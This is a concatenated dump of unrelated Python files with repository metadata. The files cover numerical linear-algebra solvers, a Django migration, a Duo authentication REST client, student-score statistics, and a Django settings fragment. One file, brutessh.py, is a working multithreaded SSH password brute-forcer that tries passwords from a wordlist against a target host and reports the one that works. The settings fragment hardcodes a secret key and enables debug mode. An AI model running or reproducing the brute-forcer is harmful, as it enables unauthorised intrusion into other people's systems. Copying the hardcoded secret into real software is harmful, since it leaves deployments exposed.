            torch.cuda.set_device(opt.gpu_ids[0])
        self.opt = opt
        return self.opt
| [
"yahui.cvrs@gmail.com"
] | yahui.cvrs@gmail.com |
8e3a3245eb53935b2ac1edf402a6fd0c933c6cf8 | 34489df05574af972e7e385ecb5b7b39f071f8dd | /main.py | 149c0605279f681074992309dae11cf90ad86be2 | [] | no_license | makc2099/Comp.methods4 | f4f39d1bc4571ebb5e0c14c3bd6fb04598fd2a67 | 9ffcfc34564b627168915d710958f823ab82c2aa | refs/heads/master | 2023-08-16T13:41:31.059500 | 2021-10-18T15:38:58 | 2021-10-18T15:38:58 | 417,944,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,092 | py | import numpy as np
from tabulate import tabulate
def iteration(alpha, beta, x, eps):
    """Simple fixed-point iteration x <- alpha @ x + beta.

    Stops when the update norm drops to eps or after 500 steps, then applies
    one final update. Returns (solution vector, step counter).
    """
    step_count = 1
    residual = eps + 1
    while residual > eps and step_count < 500:
        updated = np.dot(alpha, x) + beta
        residual = np.linalg.norm(updated - x)
        x = updated
        step_count += 1
    # One extra refinement step after the loop, mirroring the stopping rule.
    return np.dot(alpha, x) + beta, step_count
def zeidel(A, b, eps):
    """Gauss-Seidel iteration for A x = b starting from the zero vector.

    Sweeps until the change between successive iterates has norm <= eps.
    Returns (solution vector, number of sweeps).
    """
    x = np.zeros(b.shape[0])
    n = A.shape[0]
    sweeps = 0
    diff = eps + 1
    while diff > eps:
        current = x.copy()
        for i in range(n):
            # Use already-updated components below the diagonal,
            # previous-sweep components above it.
            below = sum(A[i][j] * current[j] for j in range(i))
            above = sum(A[i][j] * x[j] for j in range(i + 1, n))
            current[i] = (b[i] - below - above) / A[i][i]
        diff = np.linalg.norm(current - x)
        sweeps += 1
        x = current
    return x, sweeps
def calculate_alpha_beta(A, b):
    """Build the fixed-point form x = alpha @ x + beta of the system A x = b.

    alpha[i][j] = -A[i][j] / A[i][i] off the diagonal, 0 on it;
    beta[i] = b[i] / A[i][i].

    Fix: beta[i] was previously assigned inside the inner j-loop (and only
    when i != j), which did redundant work and left beta = 0 for 1x1 systems.
    """
    n = A.shape[0]
    alpha = np.zeros((n, n))
    beta = np.zeros(b.shape[0])
    for i in range(n):
        for j in range(n):
            if i != j:
                alpha[i][j] = - A[i][j] / A[i][i]
        # Diagonal of alpha stays 0 (already zero-initialized).
        beta[i] = b[i] / A[i][i]
    return alpha, beta
def iter_form(A):
    """Overwrite the square matrix A in place with the Hilbert matrix
    H[i][j] = 1 / (i + j + 1) of the same size, and return A."""
    size = A.shape[0]
    for row in range(size):
        for col in range(size):
            A[row][col] = 1.0 / (row + col + 1)
    return A
# Test matrices. NOTE(review): these literal entries are immediately
# overwritten by iter_form() below, which rebuilds each matrix as a Hilbert
# matrix in place — only the shapes matter here; confirm that is intended.
A2 = np.array([[1, 1 / 2,],
               [1 / 2, 1 / 3]],dtype=float)
A3 = np.array([[1, 1 / 2, 1 / 3, ],
               [1 / 2, 1 / 3, 1 / 4],
               [1 / 3, 1 / 4, 1 / 5]],dtype=float)
A4 = np.array([[-500.7, 120.7],
               [ 890.3, -550.6]],dtype=float)
# Random exact solutions (no seed is set, so results differ between runs).
x2 = np.random.uniform(0, 100, size=A2.shape[0])
x4 = np.random.uniform(0, 100, size=A4.shape[0])
x3 = np.random.uniform(0, 100, size=A3.shape[0])
# NOTE(review): p_A* are aliases, not copies — iter_form mutates in place, so
# the "original" matrices printed below are actually the Hilbert versions;
# copy.deepcopy / A.copy() was presumably intended (copy is imported).
p_A2=A2
p_A3=A3
p_A4=A4
A2 = iter_form(A2)
A4 = iter_form(A4)
A3 = iter_form(A3)
# Right-hand sides chosen so that x2/x3/x4 are the exact solutions.
b2 = np.dot(A2,x2)
b4 = np.dot(A4,x4)
b3 = np.dot(A3,x3)
alpha2, beta2 = calculate_alpha_beta(A2, b2)
alpha4, beta4 = calculate_alpha_beta(A4, b4)
alpha3, beta3 = calculate_alpha_beta(A3, b3)
# For each tolerance: iteration counts and solution errors of the simple
# iteration vs Gauss-Seidel. (Each method is run twice per row — once for
# the count, once for the solution — which doubles the work.)
print(p_A4)
print(tabulate([[10**(-5),iteration(alpha4, beta4, beta4, 10**(-5))[1],zeidel(A4, b4,10**(-5))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-5))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-5))[0])],
                [10**(-8),iteration(alpha4, beta4, beta4, 10**(-8))[1],zeidel(A4, b4,10**(-8))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-8))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-8))[0])],
                [10**(-11),iteration(alpha4, beta4, beta4, 10**(-11))[1],zeidel(A4, b4,10**(-11))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-11))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-11))[0])],
                [10**(-14),iteration(alpha4, beta4, beta4, 10**(-14))[1],zeidel(A4, b4,10**(-14))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-14))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-14))[0])]], headers=['Погрешность','#Итерации простого','#Итерации Зейделя','|x-x_pr|','|x-x_zei|'],tablefmt='orgtbl'))
print(p_A3)
print(tabulate([[10**(-5),iteration(alpha3, beta3, beta3, 10**(-5))[1],zeidel(A3, b3,10**(-5))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-5))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-5))[0])],
                [10**(-8),iteration(alpha3, beta3, beta3, 10**(-8))[1],zeidel(A3, b3,10**(-8))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-8))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-8))[0])],
                [10**(-11),iteration(alpha3, beta3, beta3, 10**(-11))[1],zeidel(A3, b3,10**(-11))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-11))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-11))[0])],
                [10**(-14),iteration(alpha3, beta3, beta3, 10**(-14))[1],zeidel(A3, b3,10**(-14))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-14))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-14))[0])]], headers=['Погрешность','#Итерации простого','#Итерации Зейделя','|x-x_pr|','|x-x_zei|'],tablefmt='orgtbl'))
print(p_A2)
print(tabulate([[10**(-5),iteration(alpha2, beta2, beta2, 10**(-5))[1],zeidel(A2, b2,10**(-5))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-5))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-5))[0])],
                [10**(-8),iteration(alpha2, beta2, beta2, 10**(-8))[1],zeidel(A2, b2,10**(-8))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-8))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-8))[0])],
                [10**(-11),iteration(alpha2, beta2, beta2, 10**(-11))[1],zeidel(A2, b2,10**(-11))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-11))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-11))[0])],
                [10**(-14),iteration(alpha2, beta2, beta2, 10**(-14))[1],zeidel(A2, b2,10**(-14))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-14))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-14))[0])]], headers=['Погрешность','#Итерации простого','#Итерации Зейделя','|x-x_pr|','|x-x_zei|'],tablefmt='orgtbl'))
| [
"makc2099@yandex.ru"
] | makc2099@yandex.ru |
9b80d82c0f685c41a834444780cd8207ebb71348 | 9f9b19a26ed931207878364d395e47a3d986751b | /dmam/migrations/0006_auto_20181022_2230.py | 6b6b882350caefc90a3b9690311255482d54076e | [] | no_license | lishulincug/waterwork | 6697f5264dc880a92d9b91e91b703eda3818d7a3 | 690fb344e7f271a3ded66f0cdf4c9161811ed1f4 | refs/heads/master | 2020-09-09T13:19:21.301200 | 2019-07-25T09:37:04 | 2019-07-25T09:37:04 | 221,456,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # Generated by Django 2.0 on 2018-10-22 22:30
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema change: redefine Station.dmaid as a
    ManyToManyField pointing at dmam.DMABaseinfo."""
    # Must be applied after dmam migration 0005.
    dependencies = [
        ('dmam', '0005_auto_20181022_1555'),
    ]
    operations = [
        migrations.AlterField(
            model_name='station',
            name='dmaid',
            field=models.ManyToManyField(to='dmam.DMABaseinfo'),
        ),
    ]
| [
"apengok@163.com"
] | apengok@163.com |
a2186908aa7b8027e46fe08ced94527e26625466 | 2a66595b5067619cf79e4e70bd47662ad01346ea | /bin/duo_client/rest.py | 6dfb577034220f5fc6f46d67fbd849ddbced6240 | [
"Apache-2.0"
] | permissive | f8al/TA_DuoSecurity | 42205ed10eecaa2b20db85d6febc508e9b21b3ba | 80de59a0f72876a06d41499a9235c6caf4cd9ea0 | refs/heads/master | 2021-01-02T09:44:01.903364 | 2015-04-28T19:53:07 | 2015-04-28T19:53:07 | 34,752,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,200 | py | """
Duo Security REST API reference client implementation.
<http://www.duosecurity.com/docs/duorest>
"""
import client
# Duo REST API signature version passed to client.call_json_api for signing.
SIG_VERSION = 1
# Second-factor types accepted by auth()'s ``factor`` argument.
FACTOR_AUTO = "auto"
FACTOR_PASSCODE = "passcode"
FACTOR_PHONE = "phone"
FACTOR_SMS = "sms"
FACTOR_PUSH = "push"
# Identifiers for a user's enrolled phones (auth()'s ``phone`` argument).
PHONE1 = "phone1"
PHONE2 = "phone2"
PHONE3 = "phone3"
PHONE4 = "phone4"
PHONE5 = "phone5"
def ping(ikey, skey, host, ca=None):
    """Liveness check.

    Returns True if and only if the Duo service is up and responding.
    """
    endpoint = "/rest/v1/ping"
    result = client.call_json_api(ikey, skey, host, 'GET', endpoint, ca,
                                  sig_version=SIG_VERSION)
    return result == 'pong'
def check(ikey, skey, host, ca=None):
    """Credential check.

    Returns True if and only if the integration key, secret key, and
    signature generation are valid.
    """
    endpoint = "/rest/v1/check"
    result = client.call_json_api(ikey, skey, host, 'GET', endpoint, ca,
                                  sig_version=SIG_VERSION)
    return result == 'valid'
def preauth(ikey, skey, host, username, ca=None):
    """Start a pre-authentication check for *username*.

    Returns the decoded JSON response from the Duo service.
    """
    return client.call_json_api(ikey, skey, host, "POST", "/rest/v1/preauth",
                                ca, sig_version=SIG_VERSION, user=username)
def auth(ikey, skey, host, username, factor=FACTOR_PHONE,
auto=None, passcode=None, phone=PHONE1, pushinfo=None,
async=False, ca=None):
"""
Returns True if authentication was a success, else False.
If 'async' is True, returns txid of the authentication transaction.
"""
path = "/rest/v1/auth"
kwargs = {}
if async:
kwargs['async'] = '1'
if factor == FACTOR_AUTO:
kwargs['auto'] = auto
elif factor == FACTOR_PASSCODE:
kwargs['code'] = passcode
elif factor == FACTOR_PHONE:
kwargs['phone'] = phone
elif factor == FACTOR_SMS:
kwargs['phone'] = phone
elif factor == FACTOR_PUSH:
kwargs['phone'] = phone
response = client.call_json_api(ikey, skey, host, "POST", path, ca,
sig_version=SIG_VERSION,
user=username,
factor=factor,
**kwargs)
if async:
return response['txid']
return response['result'] == 'allow'
def status(ikey, skey, host, txid, ca=None):
    """Poll the state of an asynchronous authentication transaction.

    Returns a 3-tuple (complete, success, description):
        complete    - True if the authentication request has completed.
        success     - True if it completed and was allowed.
        description - String describing the current status.
    """
    response = client.call_json_api(ikey, skey, host, "GET", "/rest/v1/status",
                                    ca, sig_version=SIG_VERSION, txid=txid)
    complete = "result" in response
    success = complete and response['result'] == 'allow'
    return (complete, success, response['status'])
| [
"f8al.err0r@gmail.com"
] | f8al.err0r@gmail.com |
5c5465c253daa04586e6d3556f0b179cf0fb2129 | afb227fea096c4a904b0da4d013c66245cf78030 | /brutessh.py | 4616cd6054609b851b1cf389c95cbadcacdfd8c6 | [] | no_license | mmssr/brutessh_py | 691ce658ca79b6c22b0c69af8b62311fc9c5e5ad | d513a4b34fa4056bae586ddaffb23fdbf94d8a3b | refs/heads/master | 2020-06-21T14:42:47.922657 | 2019-09-12T14:34:54 | 2019-09-12T14:34:54 | 197,483,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,956 | py | #!/usr/bin/python
import pxssh
import optparse
import time
from threading import *
# Cap on the number of simultaneous SSH connection attempts.
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
# Shared worker state: Found flips True once a password succeeds;
# Fails counts timeout-style errors observed by workers.
Found = False
Fails = 0
def connect(host, user, password, release):
    """Try one SSH login via pxssh; set the global Found flag on success.

    release -- when True this call owns a semaphore slot and must release it
    in the finally block; internal retries pass False so that only the
    outermost call releases the slot.
    """
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found: " + password)
        Found = True
    except Exception, e:
        # pxssh reports transient conditions only via the exception text.
        if 'read_nonblocking' in str(e):
            # Socket timeout: count it, back off, then retry this password.
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            # Prompt desynchronisation: brief pause, then retry.
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    """Parse command-line options and run a threaded SSH password sweep.

    Spawns up to maxConnections concurrent connect() threads, one per
    candidate password, stopping once a password is found or too many
    socket timeouts have accumulated.
    """
    parser = optparse.OptionParser('usage%prog ' + '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-u', dest='user', type='string', help='specify the user')
    parser.add_option('-F', dest='passwdfile', type='string', help='specify password file')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    user = options.user
    # BUG FIX: the option is declared with dest='passwdfile', but the original
    # read options.passwdFile (capital F), which raises AttributeError.
    passwdfile = options.passwdfile
    if host is None or user is None or passwdfile is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdfile, 'r')
    for line in fn.readlines():
        if Found:
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Exiting: Too Many Socket Timeouts")
            exit(0)
        # Block until one of the maxConnections slots is free; the worker
        # thread releases the semaphore when it finishes.
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()
    fn.close()
# Entry point: run the brute-force sweep only when executed as a script.
if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | noreply@github.com |
dac766b0f1ec3ef07bb46db14747a4554d28c271 | 1410b5c2a1d549115b16af0e8ef1efac557eaa3f | /实验二/实验代码与数据/exp2.py | 61ca5fc7c6f6c140d6866185a14666d3c30b073e | [] | no_license | NGUYEN-EDawn/Machine_Learning--experiment | cf8402014119267c9fe96164df0eb996a1092763 | 3d0e0e0f437e1f99d0b77195e9303e91d78f27cb | refs/heads/main | 2023-02-14T02:21:20.885630 | 2021-01-06T12:38:21 | 2021-01-06T12:38:21 | 327,285,634 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,087 | py | import pandas
import numpy
import matplotlib.pyplot
import seaborn
import copy
import exp1 #导入实验一的模块,方便后续读取
'''Widen pandas display settings so full frames print (all rows, wide columns).'''
def show_value():
    """Configure pandas so printed frames are not truncated."""
    # NOTE(review): the original set 'display.max_columns' twice (None, then
    # 10000); only the final value takes effect, so the redundant first call
    # has been dropped.
    pandas.set_option('display.max_rows', None)
    pandas.set_option('display.max_columns', 10000)
    pandas.set_option('display.width', 10000)
    pandas.set_option('display.max_colwidth', 10000)
'''Problem 1: scatter plot with course-1 score on the x axis and the physical
test score on the y axis.'''
def exp2_num_one(cla):
    # Map the categorical physical-test rating onto a 100-point score.
    rating_table = {'bad': 60, 'general': 70, 'good': 80, 'excellent': 90}
    # Collect (course-1, PE) pairs, skipping students with either value missing.
    score1_list = []
    pt_list = []
    for stu in cla.student:
        if (stu.score[0] == 'None') or (stu.physical_test == ''):
            continue
        score1_list.append(stu.score[0])
        pt_list.append(rating_table[stu.physical_test])
    matplotlib.pyplot.scatter(score1_list, pt_list, c='green', marker='*')
    matplotlib.pyplot.title("scatter diagram")
    matplotlib.pyplot.xlabel('score1')
    matplotlib.pyplot.ylabel('physical_test')
    matplotlib.pyplot.savefig('散点图.png', bbox_inches='tight')
    matplotlib.pyplot.show()
    # Problem 2 reuses the course-1 scores, so hand them back to the caller.
    return score1_list
'''Problem 2: histogram of course-1 scores in 5-point bins.'''
def exp2_num_two(cla, score1_list):
    """Plot and save a histogram of course-1 scores using 5-point bin edges."""
    # Bin edges at 5-point intervals.
    space = [65, 70, 75, 80, 85, 90]
    # BUG FIX: the original built `space` but never passed it to hist(), so
    # matplotlib fell back to 10 automatic bins instead of the required
    # 5-point intervals.
    matplotlib.pyplot.hist(score1_list, bins=space, edgecolor='blue')
    matplotlib.pyplot.title('cube map')
    matplotlib.pyplot.grid(True, linestyle='--', alpha=0.5, axis='y')
    matplotlib.pyplot.savefig('直方图.png', dpi=300, bbox_inches='tight')
    matplotlib.pyplot.show()
'''Problem 3: z-score normalise every subject's scores and write the
normalised data matrix to z-score.txt.'''
def exp2_num_three(cla):
    # Map the categorical physical-test rating onto a 100-point score.
    test_table = {'bad': 60, 'general': 70, 'good': 80, 'excellent': 90}
    n = len(cla.student)
    sum_pt_score = 0    # sum of PE scores (100-point scale)
    square_sum_pt = 0   # sum of squared PE scores
    sum_square_pt = 0   # square of the summed PE scores
    std_pt = 0          # standard deviation of the PE scores
    sum_score = [0, 0, 0, 0, 0, 0, 0, 0, 0]          # per-subject score sums
    square_sum_score = [0, 0, 0, 0, 0, 0, 0, 0, 0]   # per-subject sums of squares
    sum_square_score = [0, 0, 0, 0, 0, 0, 0, 0, 0]   # per-subject squared sums
    average_score = [0, 0, 0, 0, 0, 0, 0, 0, 0]      # per-subject means
    std_score = [0, 0, 0, 0, 0, 0, 0, 0, 0]          # per-subject standard deviations
    # Accumulate sums and sums of squares across all students.
    for i in range(n):
        try:
            sum_pt_score += test_table[cla.student[i].physical_test]
            square_sum_pt += pow(test_table[cla.student[i].physical_test], 2)
        except:
            # Missing / unknown rating: silently skipped (bare except kept as-is).
            pass
        for j in range(0, 9):
            if cla.student[i].score[j] == 'None':
                pass
            else:
                sum_score[j] += cla.student[i].score[j]
                square_sum_score[j] += pow(cla.student[i].score[j], 2)
    # NOTE(review): means and deviations below divide by n (all students) even
    # though missing entries were skipped in the sums, which biases the
    # statistics downward when data are missing -- confirm this is intended.
    for i in range(0, 9):
        sum_square_score[i] = pow(sum_score[i], 2)  # squared sum per subject
        average_score[i] = sum_score[i] / n  # mean per subject
    sum_square_pt = pow(sum_pt_score, 2)  # squared sum of PE scores
    average_pt = sum_pt_score / n  # mean PE score
    std_pt = pow(((square_sum_pt - sum_square_pt / n) / (n - 1)), 0.5)  # PE standard deviation
    for i in range(0, 9):
        std_score[i] = pow(((square_sum_score[i] - sum_square_score[i] / n) / (n - 1)), 0.5)  # per-subject standard deviation
    # z-score of each student's PE result; 0 is used when it cannot be computed.
    z_pt_score = []
    for i in range(n):
        try:
            z_pt_score.append((test_table[cla.student[i].physical_test] - average_pt) / std_pt)
        # Missing rating (or zero deviation) falls through to a 0 placeholder.
        except:
            z_pt_score.append(0)
    z_score = [[] for i in range(n)]
    for i in range(0, 9):
        for j in range(n):
            try:
                z_score[j].append((cla.student[j].score[i] - average_score[i]) / std_score[i])
            except:
                z_score[j].append(0)
    for i in range(n):
        z_score[i].append(z_pt_score[i])
    # NOTE(review): the function writes the matrix to disk and returns None,
    # yet the caller binds its result (std_list = exp2_num_three(cla)).
    matrix = numpy.mat(z_score)
    m_f = pandas.DataFrame(data=matrix)
    m_f.to_csv('z-score.txt', sep='\t', header=False, index=False)
'''Problem 4: compute the 100x100 student-correlation matrix and visualise it
as a heat map.'''
def exp2_num_four(cla):
    """Return the Pearson-style correlation matrix between all students.

    Mutates cla.student in place: missing marks become 0, the 10-point
    subjects (indices 5-8) are scaled to a 100-point scale, and the PE
    rating is replaced by its numeric score.
    """
    # Map the categorical PE rating onto a 100-point score (missing -> 0).
    test_table = {'': 0, 'bad': 60, 'general': 70, 'good': 80, 'excellent': 90}
    # Normalise every student's marks onto a 100-point scale.
    for i in range(len(cla.student)):
        for z in range(0, 9):
            if cla.student[i].score[z] == 'None':
                cla.student[i].score[z] = 0
        for j in range(5, 9):
            cla.student[i].score[j] *= 10
        cla.student[i].physical_test = test_table[cla.student[i].physical_test]
    # Per-student mean over the non-missing (non-zero) marks.
    average_list = []
    for i in range(len(cla.student)):
        temp = 0
        un_null = 10
        for j in range(0, 9):
            if cla.student[i].score[j] == 0:
                un_null -= 1
            else:
                temp += cla.student[i].score[j]
        if cla.student[i].physical_test == 0:
            un_null -= 1
        else:
            temp += cla.student[i].physical_test
        average_list.append(temp / un_null)
    cor_mat = numpy.mat(numpy.zeros((len(cla.student), len(cla.student))))
    # Per-student standard deviation over the non-missing marks.
    list_std = []
    for i in range(len(cla.student)):
        temp = 0
        un_null = 10
        for j in range(0, 9):
            if cla.student[i].score[j] == 0:
                un_null -= 1
            else:
                temp += ((cla.student[i].score[j] - average_list[i]) ** 2)
        if cla.student[i].physical_test == 0:
            # BUG FIX: the original did `un_null -= 0` here, so a missing PE
            # score still counted in the denominator, unlike every parallel
            # branch above.
            un_null -= 1
        else:
            temp += ((cla.student[i].physical_test - average_list[i]) ** 2)
        list_std.append(numpy.sqrt(temp / (un_null - 1)))
    # Covariance between two students over subjects both of them have.
    def cor(i, j):
        temp = 0
        un_null = 10
        for s in range(0, 9):
            if cla.student[i].score[s] == 0 or cla.student[j].score[s] == 0:
                un_null -= 1
            else:
                x = cla.student[i].score[s] - average_list[i]
                y = cla.student[j].score[s] - average_list[j]
                temp += (x*y)
        # NOTE(review): the PE term is added unconditionally, even when one of
        # the two students has no PE score -- confirm whether it should be
        # guarded like the subject loop above.
        temp += (cla.student[i].physical_test - average_list[i]) * (cla.student[j].physical_test - average_list[j])
        return temp / (un_null - 1)
    for i in range(len(cla.student)):
        for j in range(len(cla.student)):
            t = cor(i, j)
            cor_mat[i, j] = t / (list_std[i] * list_std[j])
    matplotlib.pyplot.figure(figsize=(20, 20), dpi=80)
    # Visualise the correlation matrix as a heat map.
    seaborn.heatmap(cor_mat, vmin=-1, vmax=1, linewidths=0.08, xticklabels=False, cmap='coolwarm')
    matplotlib.pyplot.savefig('热点图.png', dpi=100, bbox_inches='tight')
    matplotlib.pyplot.show()
    return cor_mat  # reused by problem 5
'''Problem 5: using the correlation matrix, find the 3 samples closest to each
sample, producing an N x 3 matrix of student ids.'''
def exp2_num_five(cla, cor_mat):
    """For every row of cor_mat, record the ids of the 3 most-correlated
    other students; print the table and write it to 矩阵输出.txt."""
    # Defensive copy so the caller's matrix cannot be disturbed.
    cor_mat_c = copy.deepcopy(cor_mat)
    ids = []  # renamed from `id`, which shadowed the builtin
    for i in range(len(cor_mat_c)):
        # Indices of row i sorted by ascending correlation; the largest entry
        # (last index) is normally the sample itself, so the three indices
        # just before it are the three nearest other samples.
        b = numpy.argsort(cor_mat_c[i], axis=1)
        nearest = []
        nearest.append(cla.student[b[0, len(cor_mat_c) - 2]].id)
        nearest.append(cla.student[b[0, len(cor_mat_c) - 3]].id)
        nearest.append(cla.student[b[0, len(cor_mat_c) - 4]].id)
        ids.append(nearest)
    # (The original also collected the correlation values into an unused
    # `maxlist`; that dead code has been dropped.)
    id_mat = numpy.mat(ids)
    dfid = pandas.DataFrame(data=id_mat)
    print(dfid)
    dfid.to_csv('矩阵输出.txt', sep='\t', index=False, header=False)
# Driver script: load and merge the two data sources with the experiment-1
# helpers, then run the experiment-2 analyses in order.
cla = exp1.Class()
cla, txt_len = exp1.Load_txt(cla, '一.数据源2-逗号间隔.txt')
cla, xls_len = exp1.Load_excel(cla, '一.数据源1.xls', txt_len)
exp1.data_unit(cla, txt_len, xls_len)
# score1_list = exp2_num_one(cla)
# exp2_num_two(cla, score1_list)
# NOTE(review): exp2_num_three() has no return statement, so std_list is
# always None here.
std_list = exp2_num_three(cla)
cor_mat = exp2_num_four(cla)
exp2_num_five(cla, cor_mat)
"noreply@github.com"
] | noreply@github.com |
07669c7e29c84fc8f5e8d47d25b8e77dceeea761 | 0a17d91a08eeb32be713271a6d954bd24dc3d70d | /local_monitor/check_pgsql.py | f9589ffac1591e6cb4517ffac7eb68b3b8aa608c | [] | no_license | Som-Energia/somenergia-systemmonitor | 2edcea3524c5379c5cc5a9fcf2ac2e804f01f94c | 51ab7c54a8a7906d42b6a343754fadf43ecda579 | refs/heads/master | 2021-01-22T03:04:59.600542 | 2015-09-18T14:03:00 | 2015-09-18T14:03:00 | 39,762,000 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,664 | py | from pgactivity.Data import Data
import sys, re
import getopt
# Monitoring settings.  host/database/logdb/logfile are intentionally blank
# here and must be filled in for the target PostgreSQL instance; the two
# thresholds select which backends get dumped.
config = {
    'host': '',
    'database': '',
    'logdb': '',
    'logfile': '',
    'mem_percent_max': 5,   # dump queries using at least this % of memory
    'cpu_percent_max': 1    # dump queries using at least this % of CPU
}
def dump(proc_id, cpu_percent, mem_percent, query_start, query, prev_queries):
    """Print one flagged backend's query plus its earlier logged statements.

    prev_queries -- list of regex match groups (date, time, pid, statement)
    harvested from the PostgreSQL log file by main().
    """
    print '################## PostgreSQL query #######################'
    print 'Query: {query}'.format(**locals())
    print 'ID: {} CPU: {} MEM: {} START: {}'.format(proc_id, cpu_percent, mem_percent, query_start)
    # NOTE(review): the loop variable shadows the `query` parameter.
    for query in prev_queries:
        if len(query) > 0:
            # groups: [0]=date, [1]=time, [3]=logged statement text
            print 'START: {} {} QUERY: {}'.format(query[0], query[1], query[3])
def main(config, skip_idle):
    """Scan active PostgreSQL backends and dump the resource-heavy ones.

    config    -- settings dict (see module-level `config`)
    skip_idle -- when True, <IDLE> backends are ignored and only backends
                 exceeding the CPU/memory thresholds are dumped.
    """
    db = Data()
    db.pg_connect(
        host = config['host'],
        database = config['database']
    )
    # NOTE(review): pg_version, waiting_queries and blocking_queries are
    # fetched but never used below.
    pg_version = db.pg_get_version()
    waiting_queries = db.pg_get_waiting()
    blocking_queries = db.pg_get_blocking()
    active_queries = db.pg_get_activities()
    active_procs = db.sys_get_proc(active_queries, True)
    n_active_procs = len(active_procs)
    for proc_id in active_procs:
        proc = active_procs[proc_id]
        query = active_procs[proc_id].query
        query_start = active_procs[proc_id].query_start
        mem_percent = proc.extras['mem_percent']
        cpu_percent = proc.extras['cpu_percent']
        if proc.query.startswith('<IDLE>') and skip_idle:
            # Idle backends are not counted as active when skipping them.
            n_active_procs -= 1
            continue
        if cpu_percent >= config['cpu_percent_max'] or mem_percent >= config['mem_percent_max'] or not skip_idle:
            # Re-scan the server log for earlier statements of this backend.
            # PERF: the pattern is constant per backend -- compiling it once
            # before the line loop would avoid recompiling on every log line.
            with open(config['logfile'], 'r') as log:
                prev_queries = []
                for line in log:
                    regex_syntax = "(\d{4}-\d{2}-\d{2}) (\d{2}:\d{2}:\d{2}) CEST %s \((%s)/\d+\) LOG: (.*)" % (config['logdb'],proc_id)
                    regex = re.compile(regex_syntax)
                    match = regex.match(line)
                    if match:
                        prev_queries.append(match.groups())
            dump(proc_id, cpu_percent, mem_percent, query_start, query, prev_queries)
    print 'Active procs: {}'.format(n_active_procs)
    # "Status" is True only when no (counted) backend is active.
    status = False
    if n_active_procs == 0:
        status = True
    print 'Status (test): {}'.format(status)
# Command-line entry point: the only recognised flags are -h (usage) and
# --skip-idle (ignore <IDLE> backends during the scan).
if __name__ == '__main__':
    argv = sys.argv[1:]
    skip_idle = False
    try:
        opts, args = getopt.getopt(argv,"h",["skip-idle"])
    except getopt.GetoptError:
        print 'monitor.py <--skip-idle>'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print 'monitor.py <--skip-idle>'
        elif opt == '--skip-idle':
            skip_idle = True
    main(config, skip_idle)
| [
"aleix.badia@somenergia.coop"
] | aleix.badia@somenergia.coop |
5ad8dd35cbbf54dd08cb65dc8a9795f629ba0491 | 077bc78b9daa8451537eb4af7288ec3536cf36d3 | /api/api/settings.py | 8bd9f8f730b7f41a3b3d1441afa57c62d5d71b6b | [] | no_license | prnvshrn/PythonPractice | fb0e8ec8034d4809682516a54ddc275b91f10b4f | 5ad7d4d97d0bb9ae559d3d86ae3271bf87b9314b | refs/heads/master | 2020-04-17T05:47:15.701006 | 2019-02-24T08:03:09 | 2019-02-24T08:03:09 | 166,296,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,111 | py | """
Django settings for api project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this secret key is committed to source control -- rotate it
# and load it from an environment variable before any production deployment.
SECRET_KEY = 't=f^k*z$)8_9(m%c$wgn3d^@1tm%4it%@!bbp)-$b7mf5$d-(b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
